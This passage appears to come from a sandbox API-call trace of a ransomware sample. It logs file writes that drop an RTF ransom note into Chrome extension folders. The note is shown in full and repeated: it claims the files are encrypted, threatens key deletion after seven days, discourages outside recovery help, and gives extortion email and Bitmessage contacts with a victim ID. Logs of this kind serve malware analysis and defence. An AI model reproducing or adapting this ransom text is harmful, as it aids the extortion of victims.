Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2358878, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nwØ\x18Æ;Q¢\x9fzP±\x15þ\x02¾oÈ\x1aÁ;\x9dÍ\x03\x1f", lpUsedDefaultChar=0x0) returned 8717 [0285.207] WriteFile (in: hFile=0x294, lpBuffer=0x2358878*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2358878*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.229] CloseHandle (hObject=0x294) returned 1 [0285.229] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\kn\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\kn\\#readme_eman#.rtf")) returned 0xffffffff [0285.229] GetLastError () returned 0x2 [0285.229] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\kn\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\kn\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.229] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.229] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 